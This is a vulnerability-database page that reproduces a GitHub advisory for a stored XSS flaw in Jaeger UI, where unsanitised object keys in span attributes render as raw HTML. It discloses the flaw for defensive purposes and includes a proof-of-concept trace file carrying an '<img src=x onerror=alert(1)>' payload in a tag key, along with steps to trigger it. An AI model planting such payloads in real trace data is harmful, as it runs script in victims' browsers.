6.5

CVSS Score

3.1

Basic Information

CVE ID

GHSA ID

GHSA-2w8w-qhg4-f78j

EPSS Score

CWE

CWE-79

Published

7/11/2023

Updated

7/11/2023

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-2w8w-qhg4-f78j

GHSA-2w8w-qhg4-f78j: A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries

Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r

Summary

Jaeger UI is using the json-markup dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable is vulnerable to XSS.

Details

The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49

PoC

Start a Jaeger UI
Save the following trace as a file:

{
    "data": [
        {
            "traceID": "076ef819cc06c45a",
            "spans": [
                {
                    "traceID": "076ef819cc06c45a",
                    "spanID": "076ef819cc06c45a",
                    "flags": 1,
                    "operationName": "and open 'attributes'",
                    "references": [],
                    "startTime": 1678196149232010,
                    "duration": 13485,
                    "tags": [
                        {
                            "key": "sampler.type",
                            "type": "string",
                            "value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
                        }
                    ],
                    "logs": [],
                    "processID": "p1",
                    "warnings": null
                }
            ],
            "processes": {
                "p1": {
                    "serviceName": "click here",
                    "tags": [
                    ]
                }
            },
            "warnings": null
        }
    ],
    "total": 0,
    "limit": 0,
    "offset": 0,
    "errors": null
}

Upload that trace to Jaeger UI in order to visualise it.
Open the trace, open it's span's attributes.
XSS should be fired.

Impact

This is a XSS on Jaeger UI. XSS can be used to run JavaScript.

(GitHub Advisory)

6.5

CVSS Score

3.1

Basic Information

CVE ID

GHSA ID

GHSA-2w8w-qhg4-f78j

EPSS Score

CWE

CWE-79

Published

7/11/2023

Updated

7/11/2023

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/jaegertracing/jaeger	go	< 1.47.0	1.47.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from how KeyValuesTable.tsx handles JSON rendering. The formatValue function (and its dependency on json-markup/react-json-view-lite) fails to sanitize object keys in JSON data. Attackers can inject malicious keys (e.g., <img src=x onerror=alert(1)>) into trace data, which are rendered as raw HTML via dangerouslySetInnerHTML. The PoC demonstrates this by embedding an XSS payload in a tag's key, which executes when the span's attributes are viewed. The root cause is the lack of key sanitization in the JSON rendering logic.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

R*l*t** UI vuln*r**ility **visory: *ttps://*it*u*.*om/j****rtr**in*/j****r-ui/s**urity/**visori*s/**S*-vv**-rm**-q**r ### Summ*ry J****r UI is usin* t** `json-m*rkup` **p*n**n*y to *ispl*y sp*n *ttri*ut*s *n* r*sour**s. T*is **p*n**n*y is not s*niti

Reasoning

T** vuln*r**ility st*ms *rom *ow K*yV*lu*sT**l*.tsx **n*l*s JSON r*n**rin*. T** *orm*tV*lu* *un*tion (*n* its **p*n**n*y on json-m*rkup/r***t-json-vi*w-lit*) **ils to s*nitiz* o*j**t k*ys in JSON **t*. *tt**k*rs **n inj**t m*li*ious k*ys (*.*., `<im*

6.5

Basic Information

Concerned about an active attack path?

GHSA-2w8w-qhg4-f78j: A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries

Summary

Details

PoC

Impact

6.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI